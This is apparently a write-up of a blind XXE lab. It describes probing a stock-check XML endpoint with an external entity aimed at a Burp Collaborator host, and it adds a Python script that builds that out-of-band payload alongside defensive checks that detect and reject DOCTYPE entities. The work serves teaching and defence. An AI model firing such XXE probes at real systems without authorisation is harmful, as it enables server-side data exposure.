
We saw an XML POST request being sent when we clicked the “Check Stock” button. We tried a simple XXE payload (an external entity declared in a DOCTYPE and referenced in the request body) but received the following response:

We then replaced the URL in the external entity with a Burp Collaborator payload, which turned the attempt into a blind (out-of-band) XXE: nothing from the entity is reflected in the response, so the Collaborator interaction is the only signal that the parser resolved it.

We saw DNS requests in the Collaborator, which confirmed the vulnerability. A DNS lookup alone shows that the server-side parser resolved our external entity; an accompanying HTTP interaction would additionally show that outbound HTTP is allowed, which matters once you move on to exfiltrating data.

Finally, we solved the lab.
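As an added example (not code from the original write-up or from the lab), the following script builds the kind of out-of-band probe used above and shows the two checks a defender wants alongside it: listing the external entities a request body declares without fetching them, and a hardened parser that rejects any DOCTYPE so no entity can be declared at all. The Collaborator hostname, the `stockCheck`/`productId`/`storeId` element names and the `http://` scheme are assumptions; the original page shows neither the request body nor the payload. Only the standard-library expat parser is used, so it runs offline.

```python
"""Added example (not from the original write-up): build a blind XXE probe
and inspect/parse request bodies safely.  The Collaborator host and the
stockCheck element names are assumptions, not values from the page."""
import xml.parsers.expat

# Assumed request structure for the stock-check endpoint (not confirmed by the page).
STOCK_CHECK_TEMPLATE = (
    '<?xml version="1.0" encoding="UTF-8"?>'
    '<!DOCTYPE stockCheck [<!ENTITY xxe SYSTEM "{url}">]>'
    '<stockCheck><productId>&xxe;</productId><storeId>1</storeId></stockCheck>'
)


def build_blind_xxe_payload(collaborator_host: str) -> str:
    """Return a request body whose external entity points at an out-of-band host.

    The response never echoes productId, so the only evidence that the entity
    was resolved is the DNS/HTTP interaction the parser makes with the host.
    """
    return STOCK_CHECK_TEMPLATE.format(url=f"http://{collaborator_host}/")


def external_entities(xml_body: str) -> list:
    """List the system identifiers of every external entity declared in xml_body.

    Uses expat's declaration callback only: each entity is recorded, never
    fetched, so this is safe to run over untrusted input (e.g. a log-review
    or WAF-style check for XXE attempts).
    """
    found = []
    parser = xml.parsers.expat.ParserCreate()

    def on_entity_decl(name, is_param, value, base, system_id, public_id, notation):
        if system_id is not None:
            found.append(system_id)

    def on_external_ref(context, base, system_id, public_id):
        # Returning 1 tells expat to continue parsing without resolving the entity.
        return 1

    parser.EntityDeclHandler = on_entity_decl
    parser.ExternalEntityRefHandler = on_external_ref
    parser.Parse(xml_body, True)
    return found


def parse_without_dtd(xml_body: str) -> dict:
    """Hardened counterpart: refuse any document that carries a DOCTYPE.

    With no DOCTYPE there are no entity declarations, which removes XXE
    (blind or not) regardless of parser defaults.  Returns the text of each
    leaf element keyed by element name.
    """
    parser = xml.parsers.expat.ParserCreate()
    fields = {}
    path = []

    def on_doctype(name, system_id, public_id, has_internal_subset):
        raise ValueError("DOCTYPE declarations are not accepted")

    def on_start(name, attrs):
        path.append(name)

    def on_end(name):
        path.pop()

    def on_text(data):
        if path and data.strip():
            fields[path[-1]] = fields.get(path[-1], "") + data.strip()

    parser.StartDoctypeDeclHandler = on_doctype
    parser.StartElementHandler = on_start
    parser.EndElementHandler = on_end
    parser.CharacterDataHandler = on_text
    parser.Parse(xml_body, True)
    return fields


if __name__ == "__main__":
    # Assumed Collaborator host; substitute the one Burp generates for you.
    probe = build_blind_xxe_payload("example-id.oastify.com")
    print("external entities in probe:", external_entities(probe))
    try:
        parse_without_dtd(probe)
    except ValueError as exc:
        print("hardened parser rejected probe:", exc)
    # Constructed benign stock-check body for comparison.
    benign = ('<?xml version="1.0"?><stockCheck><productId>1</productId>'
              '<storeId>1</storeId></stockCheck>')
    print("hardened parser accepted benign body:", parse_without_dtd(benign))
```

`external_entities` is the triage check: if a request body to an endpoint that never legitimately declares entities returns a non-empty list, someone is probing for XXE, and the recorded URL tells you where the callback would have gone. `parse_without_dtd` is the fix the lab's application needed: rejecting the DOCTYPE outright is simpler and more robust than trying to disable entity resolution feature by feature across parser libraries.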
